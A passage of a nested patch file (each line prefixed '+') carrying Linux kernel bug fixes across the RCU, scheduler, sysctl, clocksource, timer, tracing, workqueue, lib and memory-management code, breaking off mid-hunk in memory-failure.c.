+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -667,7 +667,9 @@ static void synchronize_rcu_expedited_wait(void)
+ 				mask = leaf_node_cpu_bit(rnp, cpu);
+ 				if (!(READ_ONCE(rnp->expmask) & mask))
+ 					continue;
++				preempt_disable(); // For smp_processor_id() in dump_cpu_task().
+ 				dump_cpu_task(cpu);
++				preempt_enable();
+ 			}
+ 		}
+ 		jiffies_stall = 3 * rcu_exp_jiffies_till_stall_check() + 3;
+diff --git a/kernel/resource.c b/kernel/resource.c
+index ddbbacb9fb508..b1763b2fd7ef3 100644
+--- a/kernel/resource.c
++++ b/kernel/resource.c
+@@ -1343,20 +1343,6 @@ retry:
+ 			continue;
+ 		}
+ 
+-		/*
+-		 * All memory regions added from memory-hotplug path have the
+-		 * flag IORESOURCE_SYSTEM_RAM. If the resource does not have
+-		 * this flag, we know that we are dealing with a resource coming
+-		 * from HMM/devm. HMM/devm use another mechanism to add/release
+-		 * a resource. This goes via devm_request_mem_region and
+-		 * devm_release_mem_region.
+-		 * HMM/devm take care to release their resources when they want,
+-		 * so if we are dealing with them, let us just back off here.
+-		 */
+-		if (!(res->flags & IORESOURCE_SYSRAM)) {
+-			break;
+-		}
+-
+ 		if (!(res->flags & IORESOURCE_MEM))
+ 			break;
+ 
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index ed2a47e4ddaec..0a11f44adee57 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -1777,6 +1777,8 @@ static struct sched_rt_entity *pick_next_rt_entity(struct rt_rq *rt_rq)
+ 	BUG_ON(idx >= MAX_RT_PRIO);
+ 
+ 	queue = array->queue + idx;
++	if (SCHED_WARN_ON(list_empty(queue)))
++		return NULL;
+ 	next = list_entry(queue->next, struct sched_rt_entity, run_list);
+ 
+ 	return next;
+@@ -1789,7 +1791,8 @@ static struct task_struct *_pick_next_task_rt(struct rq *rq)
+ 
+ 	do {
+ 		rt_se = pick_next_rt_entity(rt_rq);
+-		BUG_ON(!rt_se);
++		if (unlikely(!rt_se))
++			return NULL;
+ 		rt_rq = group_rt_rq(rt_se);
+ 	} while (rt_rq);
+ 
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index 137d4abe3eda1..1c240d2c99bcb 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -425,21 +425,6 @@ static void proc_put_char(void **buf, size_t *size, char c)
+ 	}
+ }
+ 
+-static int do_proc_dobool_conv(bool *negp, unsigned long *lvalp,
+-				int *valp,
+-				int write, void *data)
+-{
+-	if (write) {
+-		*(bool *)valp = *lvalp;
+-	} else {
+-		int val = *(bool *)valp;
+-
+-		*lvalp = (unsigned long)val;
+-		*negp = false;
+-	}
+-	return 0;
+-}
+-
+ static int do_proc_dointvec_conv(bool *negp, unsigned long *lvalp,
+ 				 int *valp,
+ 				 int write, void *data)
+@@ -710,16 +695,36 @@ int do_proc_douintvec(struct ctl_table *table, int write,
+  * @lenp: the size of the user buffer
+  * @ppos: file position
+  *
+- * Reads/writes up to table->maxlen/sizeof(unsigned int) integer
+- * values from/to the user buffer, treated as an ASCII string.
++ * Reads/writes one integer value from/to the user buffer,
++ * treated as an ASCII string.
++ *
++ * table->data must point to a bool variable and table->maxlen must
++ * be sizeof(bool).
+  *
+  * Returns 0 on success.
+  */
+ int proc_dobool(struct ctl_table *table, int write, void *buffer,
+ 		size_t *lenp, loff_t *ppos)
+ {
+-	return do_proc_dointvec(table, write, buffer, lenp, ppos,
+-				do_proc_dobool_conv, NULL);
++	struct ctl_table tmp;
++	bool *data = table->data;
++	int res, val;
++
++	/* Do not support arrays yet. */
++	if (table->maxlen != sizeof(bool))
++		return -EINVAL;
++
++	tmp = *table;
++	tmp.maxlen = sizeof(val);
++	tmp.data = &val;
++
++	val = READ_ONCE(*data);
++	res = proc_dointvec(&tmp, write, buffer, lenp, ppos);
++	if (res)
++		return res;
++	if (write)
++		WRITE_ONCE(*data, val);
++	return 0;
+ }
+ 
+ /**
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index 9cf32ccda715d..8cd74b89d5776 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -384,6 +384,15 @@ void clocksource_verify_percpu(struct clocksource *cs)
+ }
+ EXPORT_SYMBOL_GPL(clocksource_verify_percpu);
+ 
++static inline void clocksource_reset_watchdog(void)
++{
++	struct clocksource *cs;
++
++	list_for_each_entry(cs, &watchdog_list, wd_list)
++		cs->flags &= ~CLOCK_SOURCE_WATCHDOG;
++}
++
++
+ static void clocksource_watchdog(struct timer_list *unused)
+ {
+ 	u64 csnow, wdnow, cslast, wdlast, delta;
+@@ -391,6 +400,7 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 	int64_t wd_nsec, cs_nsec;
+ 	struct clocksource *cs;
+ 	enum wd_read_status read_ret;
++	unsigned long extra_wait = 0;
+ 	u32 md;
+ 
+ 	spin_lock(&watchdog_lock);
+@@ -410,13 +420,30 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 
+ 		read_ret = cs_watchdog_read(cs, &csnow, &wdnow);
+ 
+-		if (read_ret != WD_READ_SUCCESS) {
+-			if (read_ret == WD_READ_UNSTABLE)
+-				/* Clock readout unreliable, so give it up. */
+-				__clocksource_unstable(cs);
++		if (read_ret == WD_READ_UNSTABLE) {
++			/* Clock readout unreliable, so give it up. */
++			__clocksource_unstable(cs);
+ 			continue;
+ 		}
+ 
++		/*
++		 * When WD_READ_SKIP is returned, it means the system is likely
++		 * under very heavy load, where the latency of reading
++		 * watchdog/clocksource is very big, and affect the accuracy of
++		 * watchdog check. So give system some space and suspend the
++		 * watchdog check for 5 minutes.
++		 */
++		if (read_ret == WD_READ_SKIP) {
++			/*
++			 * As the watchdog timer will be suspended, and
++			 * cs->last could keep unchanged for 5 minutes, reset
++			 * the counters.
++			 */
++			clocksource_reset_watchdog();
++			extra_wait = HZ * 300;
++			break;
++		}
++
+ 		/* Clocksource initialized ? */
+ 		if (!(cs->flags & CLOCK_SOURCE_WATCHDOG) ||
+ 		    atomic_read(&watchdog_reset_pending)) {
+@@ -512,7 +539,7 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 	 * pair clocksource_stop_watchdog() clocksource_start_watchdog().
+ 	 */
+ 	if (!timer_pending(&watchdog_timer)) {
+-		watchdog_timer.expires += WATCHDOG_INTERVAL;
++		watchdog_timer.expires += WATCHDOG_INTERVAL + extra_wait;
+ 		add_timer_on(&watchdog_timer, next_cpu);
+ 	}
+ out:
+@@ -537,14 +564,6 @@ static inline void clocksource_stop_watchdog(void)
+ 	watchdog_running = 0;
+ }
+ 
+-static inline void clocksource_reset_watchdog(void)
+-{
+-	struct clocksource *cs;
+-
+-	list_for_each_entry(cs, &watchdog_list, wd_list)
+-		cs->flags &= ~CLOCK_SOURCE_WATCHDOG;
+-}
+-
+ static void clocksource_resume_watchdog(void)
+ {
+ 	atomic_inc(&watchdog_reset_pending);
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab62603..e4f0e3b0c4f4f 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2126,6 +2126,7 @@ SYSCALL_DEFINE2(nanosleep, struct __kernel_timespec __user *, rqtp,
+ 	if (!timespec64_valid(&tu))
+ 		return -EINVAL;
+ 
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 	return hrtimer_nanosleep(timespec64_to_ktime(tu), HRTIMER_MODE_REL,
+@@ -2147,6 +2148,7 @@ SYSCALL_DEFINE2(nanosleep_time32, struct old_timespec32 __user *, rqtp,
+ 	if (!timespec64_valid(&tu))
+ 		return -EINVAL;
+ 
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 	return hrtimer_nanosleep(timespec64_to_ktime(tu), HRTIMER_MODE_REL,
+diff --git a/kernel/time/posix-stubs.c b/kernel/time/posix-stubs.c
+index 90ea5f373e50e..828aeecbd1e8a 100644
+--- a/kernel/time/posix-stubs.c
++++ b/kernel/time/posix-stubs.c
+@@ -147,6 +147,7 @@ SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 	texp = timespec64_to_ktime(t);
+@@ -240,6 +241,7 @@ SYSCALL_DEFINE4(clock_nanosleep_time32, clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 	texp = timespec64_to_ktime(t);
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 5dead89308b74..0c8a87a11b39d 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -1270,6 +1270,7 @@ SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 
+@@ -1297,6 +1298,7 @@ SYSCALL_DEFINE4(clock_nanosleep_time32, clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 
+diff --git a/kernel/time/test_udelay.c b/kernel/time/test_udelay.c
+index 13b11eb62685e..20d5df631570e 100644
+--- a/kernel/time/test_udelay.c
++++ b/kernel/time/test_udelay.c
+@@ -149,7 +149,7 @@ module_init(udelay_test_init);
+ static void __exit udelay_test_exit(void)
+ {
+ 	mutex_lock(&udelay_test_lock);
+-	debugfs_remove(debugfs_lookup(DEBUGFS_FILENAME, NULL));
++	debugfs_lookup_and_remove(DEBUGFS_FILENAME, NULL);
+ 	mutex_unlock(&udelay_test_lock);
+ }
+ 
+diff --git a/kernel/torture.c b/kernel/torture.c
+index 789aeb0e1159c..9266ca168b8f5 100644
+--- a/kernel/torture.c
++++ b/kernel/torture.c
+@@ -915,7 +915,7 @@ void torture_kthread_stopping(char *title)
+ 	VERBOSE_TOROUT_STRING(buf);
+ 	while (!kthread_should_stop()) {
+ 		torture_shutdown_absorb(title);
+-		schedule_timeout_uninterruptible(1);
++		schedule_timeout_uninterruptible(HZ / 20);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(torture_kthread_stopping);
+diff --git a/kernel/trace/blktrace.c b/kernel/trace/blktrace.c
+index 918a7d12df8ff..5743be5594153 100644
+--- a/kernel/trace/blktrace.c
++++ b/kernel/trace/blktrace.c
+@@ -320,8 +320,8 @@ static void blk_trace_free(struct request_queue *q, struct blk_trace *bt)
+ 	 * under 'q->debugfs_dir', thus lookup and remove them.
+ 	 */
+ 	if (!bt->dir) {
+-		debugfs_remove(debugfs_lookup("dropped", q->debugfs_dir));
+-		debugfs_remove(debugfs_lookup("msg", q->debugfs_dir));
++		debugfs_lookup_and_remove("dropped", q->debugfs_dir);
++		debugfs_lookup_and_remove("msg", q->debugfs_dir);
+ 	} else {
+ 		debugfs_remove(bt->dir);
+ 	}
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c366a0a9ddba4..b641cab2745e9 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1580,19 +1580,6 @@ static int rb_check_bpage(struct ring_buffer_per_cpu *cpu_buffer,
+ 	return 0;
+ }
+ 
+-/**
+- * rb_check_list - make sure a pointer to a list has the last bits zero
+- */
+-static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
+-			 struct list_head *list)
+-{
+-	if (RB_WARN_ON(cpu_buffer, rb_list_head(list->prev) != list->prev))
+-		return 1;
+-	if (RB_WARN_ON(cpu_buffer, rb_list_head(list->next) != list->next))
+-		return 1;
+-	return 0;
+-}
+-
+ /**
+  * rb_check_pages - integrity check of buffer pages
+  * @cpu_buffer: CPU buffer with pages to test
+@@ -1602,36 +1589,27 @@ static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
+  */
+ static int rb_check_pages(struct ring_buffer_per_cpu *cpu_buffer)
+ {
+-	struct list_head *head = cpu_buffer->pages;
+-	struct buffer_page *bpage, *tmp;
++	struct list_head *head = rb_list_head(cpu_buffer->pages);
++	struct list_head *tmp;
+ 
+-	/* Reset the head page if it exists */
+-	if (cpu_buffer->head_page)
+-		rb_set_head_page(cpu_buffer);
+-
+-	rb_head_page_deactivate(cpu_buffer);
+-
+-	if (RB_WARN_ON(cpu_buffer, head->next->prev != head))
+-		return -1;
+-	if (RB_WARN_ON(cpu_buffer, head->prev->next != head))
++	if (RB_WARN_ON(cpu_buffer,
++			rb_list_head(rb_list_head(head->next)->prev) != head))
+ 		return -1;
+ 
+-	if (rb_check_list(cpu_buffer, head))
++	if (RB_WARN_ON(cpu_buffer,
++			rb_list_head(rb_list_head(head->prev)->next) != head))
+ 		return -1;
+ 
+-	list_for_each_entry_safe(bpage, tmp, head, list) {
++	for (tmp = rb_list_head(head->next); tmp != head; tmp = rb_list_head(tmp->next)) {
+ 		if (RB_WARN_ON(cpu_buffer,
+-			       bpage->list.next->prev != &bpage->list))
++				rb_list_head(rb_list_head(tmp->next)->prev) != tmp))
+ 			return -1;
++
+ 		if (RB_WARN_ON(cpu_buffer,
+-			       bpage->list.prev->next != &bpage->list))
+-			return -1;
+-		if (rb_check_list(cpu_buffer, &bpage->list))
++				rb_list_head(rb_list_head(tmp->prev)->next) != tmp))
+ 			return -1;
+ 	}
+ 
+-	rb_head_page_activate(cpu_buffer);
+-
+ 	return 0;
+ }
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index c9e40f6926504..b677f8d61deb1 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5598,7 +5598,7 @@ static const char readme_msg[] =
+ #ifdef CONFIG_HIST_TRIGGERS
+ 	"\t           s:[synthetic/]<event> <field> [<field>]\n"
+ #endif
+-	"\t           e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>]\n"
++	"\t           e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>] [if <filter>]\n"
+ 	"\t           -:[<group>/][<event>]\n"
+ #ifdef CONFIG_KPROBE_EVENTS
+ 	"\t    place: [<module>:]<symbol>[+<offset>]|<memaddr>\n"
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 07895deca2711..76ea87b0251ce 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -326,7 +326,7 @@ static struct rcuwait manager_wait = __RCUWAIT_INITIALIZER(manager_wait);
+ static LIST_HEAD(workqueues);		/* PR: list of all workqueues */
+ static bool workqueue_freezing;		/* PL: have wqs started freezing? */
+ 
+-/* PL: allowable cpus for unbound wqs and work items */
++/* PL&A: allowable cpus for unbound wqs and work items */
+ static cpumask_var_t wq_unbound_cpumask;
+ 
+ /* CPU where unbound work was last round robin scheduled from this CPU */
+@@ -3952,7 +3952,8 @@ static void apply_wqattrs_cleanup(struct apply_wqattrs_ctx *ctx)
+ /* allocate the attrs and pwqs for later installation */
+ static struct apply_wqattrs_ctx *
+ apply_wqattrs_prepare(struct workqueue_struct *wq,
+-		      const struct workqueue_attrs *attrs)
++		      const struct workqueue_attrs *attrs,
++		      const cpumask_var_t unbound_cpumask)
+ {
+ 	struct apply_wqattrs_ctx *ctx;
+ 	struct workqueue_attrs *new_attrs, *tmp_attrs;
+@@ -3968,14 +3969,15 @@ apply_wqattrs_prepare(struct workqueue_struct *wq,
+ 		goto out_free;
+ 
+ 	/*
+-	 * Calculate the attrs of the default pwq.
++	 * Calculate the attrs of the default pwq with unbound_cpumask
++	 * which is wq_unbound_cpumask or to set to wq_unbound_cpumask.
+ 	 * If the user configured cpumask doesn't overlap with the
+ 	 * wq_unbound_cpumask, we fallback to the wq_unbound_cpumask.
+ 	 */
+ 	copy_workqueue_attrs(new_attrs, attrs);
+-	cpumask_and(new_attrs->cpumask, new_attrs->cpumask, wq_unbound_cpumask);
++	cpumask_and(new_attrs->cpumask, new_attrs->cpumask, unbound_cpumask);
+ 	if (unlikely(cpumask_empty(new_attrs->cpumask)))
+-		cpumask_copy(new_attrs->cpumask, wq_unbound_cpumask);
++		cpumask_copy(new_attrs->cpumask, unbound_cpumask);
+ 
+ 	/*
+ 	 * We may create multiple pwqs with differing cpumasks.  Make a
+@@ -4072,7 +4074,7 @@ static int apply_workqueue_attrs_locked(struct workqueue_struct *wq,
+ 		wq->flags &= ~__WQ_ORDERED;
+ 	}
+ 
+-	ctx = apply_wqattrs_prepare(wq, attrs);
++	ctx = apply_wqattrs_prepare(wq, attrs, wq_unbound_cpumask);
+ 	if (!ctx)
+ 		return -ENOMEM;
+ 
+@@ -5334,7 +5336,7 @@ out_unlock:
+ }
+ #endif /* CONFIG_FREEZER */
+ 
+-static int workqueue_apply_unbound_cpumask(void)
++static int workqueue_apply_unbound_cpumask(const cpumask_var_t unbound_cpumask)
+ {
+ 	LIST_HEAD(ctxs);
+ 	int ret = 0;
+@@ -5350,7 +5352,7 @@ static int workqueue_apply_unbound_cpumask(void)
+ 		if (wq->flags & __WQ_ORDERED)
+ 			continue;
+ 
+-		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs);
++		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs, unbound_cpumask);
+ 		if (!ctx) {
+ 			ret = -ENOMEM;
+ 			break;
+@@ -5365,6 +5367,11 @@ static int workqueue_apply_unbound_cpumask(void)
+ 		apply_wqattrs_cleanup(ctx);
+ 	}
+ 
++	if (!ret) {
++		mutex_lock(&wq_pool_attach_mutex);
++		cpumask_copy(wq_unbound_cpumask, unbound_cpumask);
++		mutex_unlock(&wq_pool_attach_mutex);
++	}
+ 	return ret;
+ }
+ 
+@@ -5383,7 +5390,6 @@ static int workqueue_apply_unbound_cpumask(void)
+ int workqueue_set_unbound_cpumask(cpumask_var_t cpumask)
+ {
+ 	int ret = -EINVAL;
+-	cpumask_var_t saved_cpumask;
+ 
+ 	/*
+ 	 * Not excluding isolated cpus on purpose.
+@@ -5397,23 +5403,8 @@ int workqueue_set_unbound_cpumask(cpumask_var_t cpumask)
+ 			goto out_unlock;
+ 		}
+ 
+-		if (!zalloc_cpumask_var(&saved_cpumask, GFP_KERNEL)) {
+-			ret = -ENOMEM;
+-			goto out_unlock;
+-		}
+-
+-		/* save the old wq_unbound_cpumask. */
+-		cpumask_copy(saved_cpumask, wq_unbound_cpumask);
+-
+-		/* update wq_unbound_cpumask at first and apply it to wqs. */
+-		cpumask_copy(wq_unbound_cpumask, cpumask);
+-		ret = workqueue_apply_unbound_cpumask();
+-
+-		/* restore the wq_unbound_cpumask when failed. */
+-		if (ret < 0)
+-			cpumask_copy(wq_unbound_cpumask, saved_cpumask);
++		ret = workqueue_apply_unbound_cpumask(cpumask);
+ 
+-		free_cpumask_var(saved_cpumask);
+ out_unlock:
+ 		apply_wqattrs_unlock();
+ 	}
+diff --git a/lib/bug.c b/lib/bug.c
+index c223a2575b721..e0ff219899902 100644
+--- a/lib/bug.c
++++ b/lib/bug.c
+@@ -47,6 +47,7 @@
+ #include <linux/sched.h>
+ #include <linux/rculist.h>
+ #include <linux/ftrace.h>
++#include <linux/context_tracking.h>
+ 
+ extern struct bug_entry __start___bug_table[], __stop___bug_table[];
+ 
+@@ -153,7 +154,7 @@ struct bug_entry *find_bug(unsigned long bugaddr)
+ 	return module_find_bug(bugaddr);
+ }
+ 
+-enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
++static enum bug_trap_type __report_bug(unsigned long bugaddr, struct pt_regs *regs)
+ {
+ 	struct bug_entry *bug;
+ 	const char *file;
+@@ -209,6 +210,18 @@ enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
+ 	return BUG_TRAP_TYPE_BUG;
+ }
+ 
++enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
++{
++	enum bug_trap_type ret;
++	bool rcu = false;
++
++	rcu = warn_rcu_enter();
++	ret = __report_bug(bugaddr, regs);
++	warn_rcu_exit(rcu);
++
++	return ret;
++}
++
+ static void clear_once_table(struct bug_entry *start, struct bug_entry *end)
+ {
+ 	struct bug_entry *bug;
+diff --git a/lib/errname.c b/lib/errname.c
+index 05cbf731545f0..67739b174a8cc 100644
+--- a/lib/errname.c
++++ b/lib/errname.c
+@@ -21,6 +21,7 @@ static const char *names_0[] = {
+ 	E(EADDRNOTAVAIL),
+ 	E(EADV),
+ 	E(EAFNOSUPPORT),
++	E(EAGAIN), /* EWOULDBLOCK */
+ 	E(EALREADY),
+ 	E(EBADE),
+ 	E(EBADF),
+@@ -31,15 +32,17 @@ static const char *names_0[] = {
+ 	E(EBADSLT),
+ 	E(EBFONT),
+ 	E(EBUSY),
+-#ifdef ECANCELLED
+-	E(ECANCELLED),
+-#endif
++	E(ECANCELED), /* ECANCELLED */
+ 	E(ECHILD),
+ 	E(ECHRNG),
+ 	E(ECOMM),
+ 	E(ECONNABORTED),
++	E(ECONNREFUSED), /* EREFUSED */
+ 	E(ECONNRESET),
++	E(EDEADLK), /* EDEADLOCK */
++#if EDEADLK != EDEADLOCK /* mips, sparc, powerpc */
+ 	E(EDEADLOCK),
++#endif
+ 	E(EDESTADDRREQ),
+ 	E(EDOM),
+ 	E(EDOTDOT),
+@@ -166,14 +169,17 @@ static const char *names_0[] = {
+ 	E(EUSERS),
+ 	E(EXDEV),
+ 	E(EXFULL),
+-
+-	E(ECANCELED), /* ECANCELLED */
+-	E(EAGAIN), /* EWOULDBLOCK */
+-	E(ECONNREFUSED), /* EREFUSED */
+-	E(EDEADLK), /* EDEADLOCK */
+ };
+ #undef E
+ 
++#ifdef EREFUSED /* parisc */
++static_assert(EREFUSED == ECONNREFUSED);
++#endif
++#ifdef ECANCELLED /* parisc */
++static_assert(ECANCELLED == ECANCELED);
++#endif
++static_assert(EAGAIN == EWOULDBLOCK); /* everywhere */
++
+ #define E(err) [err - 512 + BUILD_BUG_ON_ZERO(err < 512 || err > 550)] = "-" #err
+ static const char *names_512[] = {
+ 	E(ERESTARTSYS),
+diff --git a/lib/kobject.c b/lib/kobject.c
+index 985ee1c4f2c60..d20ce15eec2d0 100644
+--- a/lib/kobject.c
++++ b/lib/kobject.c
+@@ -112,7 +112,7 @@ static int get_kobj_path_length(const struct kobject *kobj)
+ 	return length;
+ }
+ 
+-static void fill_kobj_path(const struct kobject *kobj, char *path, int length)
++static int fill_kobj_path(const struct kobject *kobj, char *path, int length)
+ {
+ 	const struct kobject *parent;
+ 
+@@ -121,12 +121,16 @@ static void fill_kobj_path(const struct kobject *kobj, char *path, int length)
+ 		int cur = strlen(kobject_name(parent));
+ 		/* back up enough to print this name with '/' */
+ 		length -= cur;
++		if (length <= 0)
++			return -EINVAL;
+ 		memcpy(path + length, kobject_name(parent), cur);
+ 		*(path + --length) = '/';
+ 	}
+ 
+ 	pr_debug("kobject: '%s' (%p): %s: path = '%s'\n", kobject_name(kobj),
+ 		 kobj, __func__, path);
++
++	return 0;
+ }
+ 
+ /**
+@@ -141,13 +145,17 @@ char *kobject_get_path(const struct kobject *kobj, gfp_t gfp_mask)
+ 	char *path;
+ 	int len;
+ 
++retry:
+ 	len = get_kobj_path_length(kobj);
+ 	if (len == 0)
+ 		return NULL;
+ 	path = kzalloc(len, gfp_mask);
+ 	if (!path)
+ 		return NULL;
+-	fill_kobj_path(kobj, path, len);
++	if (fill_kobj_path(kobj, path, len)) {
++		kfree(path);
++		goto retry;
++	}
+ 
+ 	return path;
+ }
+diff --git a/lib/mpi/mpicoder.c b/lib/mpi/mpicoder.c
+index 39c4c67310946..3cb6bd148fa9e 100644
+--- a/lib/mpi/mpicoder.c
++++ b/lib/mpi/mpicoder.c
+@@ -504,7 +504,8 @@ MPI mpi_read_raw_from_sgl(struct scatterlist *sgl, unsigned int nbytes)
+ 
+ 	while (sg_miter_next(&miter)) {
+ 		buff = miter.addr;
+-		len = miter.length;
++		len = min_t(unsigned, miter.length, nbytes);
++		nbytes -= len;
+ 
+ 		for (x = 0; x < len; x++) {
+ 			a <<= 8;
+diff --git a/lib/sbitmap.c b/lib/sbitmap.c
+index 1fcede228fa25..888c51235bd3c 100644
+--- a/lib/sbitmap.c
++++ b/lib/sbitmap.c
+@@ -464,13 +464,10 @@ void sbitmap_queue_recalculate_wake_batch(struct sbitmap_queue *sbq,
+ 					    unsigned int users)
+ {
+ 	unsigned int wake_batch;
+-	unsigned int min_batch;
+ 	unsigned int depth = (sbq->sb.depth + users - 1) / users;
+ 
+-	min_batch = sbq->sb.depth >= (4 * SBQ_WAIT_QUEUES) ? 4 : 1;
+-
+ 	wake_batch = clamp_val(depth / SBQ_WAIT_QUEUES,
+-			min_batch, SBQ_WAKE_BATCH);
++			1, SBQ_WAKE_BATCH);
+ 
+ 	WRITE_ONCE(sbq->wake_batch, wake_batch);
+ }
+@@ -521,11 +518,9 @@ unsigned long __sbitmap_queue_get_batch(struct sbitmap_queue *sbq, int nr_tags,
+ 
+ 			get_mask = ((1UL << nr_tags) - 1) << nr;
+ 			val = READ_ONCE(map->word);
+-			do {
+-				if ((val & ~get_mask) != val)
+-					goto next;
+-			} while (!atomic_long_try_cmpxchg(ptr, &val,
+-							  get_mask | val));
++			while (!atomic_long_try_cmpxchg(ptr, &val,
++							  get_mask | val))
++				;
+ 			get_mask = (get_mask & ~val) >> nr;
+ 			if (get_mask) {
+ 				*offset = nr + (index << sb->shift);
+diff --git a/mm/damon/paddr.c b/mm/damon/paddr.c
+index e1a4315c4be6a..402d30b37aba9 100644
+--- a/mm/damon/paddr.c
++++ b/mm/damon/paddr.c
+@@ -219,12 +219,11 @@ static unsigned long damon_pa_pageout(struct damon_region *r)
+ 			put_page(page);
+ 			continue;
+ 		}
+-		if (PageUnevictable(page)) {
++		if (PageUnevictable(page))
+ 			putback_lru_page(page);
+-		} else {
++		else
+ 			list_add(&page->lru, &page_list);
+-			put_page(page);
+-		}
++		put_page(page);
+ 	}
+ 	applied = reclaim_pages(&page_list);
+ 	cond_resched();
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 1b791b26d72d7..d6651be1aa520 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2837,6 +2837,9 @@ void deferred_split_huge_page(struct page *page)
+ 	if (PageSwapCache(page))
+ 		return;
+ 
++	if (!list_empty(page_deferred_list(page)))
++		return;
++
+ 	spin_lock_irqsave(&ds_queue->split_queue_lock, flags);
+ 	if (list_empty(page_deferred_list(page))) {
+ 		count_vm_event(THP_DEFERRED_SPLIT_PAGE);
+diff --git a/mm/hugetlb_vmemmap.c b/mm/hugetlb_vmemmap.c
+index 45e93a545dd7e..a559037cce00c 100644
+--- a/mm/hugetlb_vmemmap.c
++++ b/mm/hugetlb_vmemmap.c
+@@ -581,7 +581,7 @@ static struct ctl_table hugetlb_vmemmap_sysctls[] = {
+ 	{
+ 		.procname	= "hugetlb_optimize_vmemmap",
+ 		.data		= &vmemmap_optimize_enabled,
+-		.maxlen		= sizeof(int),
++		.maxlen		= sizeof(vmemmap_optimize_enabled),
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dobool,
+ 	},
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 73afff8062f9b..2eee092f8f119 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3914,6 +3914,10 @@ static int mem_cgroup_move_charge_write(struct cgroup_subsys_state *css,
+ {
+ 	struct mem_cgroup *memcg = mem_cgroup_from_css(css);
+ 
++	pr_warn_once("Cgroup memory moving (move_charge_at_immigrate) is deprecated. "
++		     "Please report your usecase to linux-mm@kvack.org if you "
++		     "depend on this functionality.\n");
++
+ 	if (val & ~MOVE_MASK)
+ 		return -EINVAL;
+ 
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index c77a9e37e27e0..89361306bfdba 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -1034,7 +1034,7 @@ static int me_pagecache_dirty(struct page_state *ps, struct page *p)
+  * cache and swap cache(ie. page is freshly swapped in). So it could be
+  * referenced concurrently by 2 types of PTEs:
+  * normal PTEs and swap PTEs. We try to handle them consistently by calling
+- * try_to_unmap(TTU_IGNORE_HWPOISON) to convert the normal PTEs to swap PTEs,
++ * try_to_unmap(!TTU_HWPOISON) to convert the normal PTEs to swap PTEs,
+  * and then
+  *      - clear dirty bit to prevent IO
+  *      - remove from LRU
+@@ -1415,7 +1415,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 				  int flags, struct page *hpage)
+ {
+ 	struct folio *folio = page_folio(hpage);
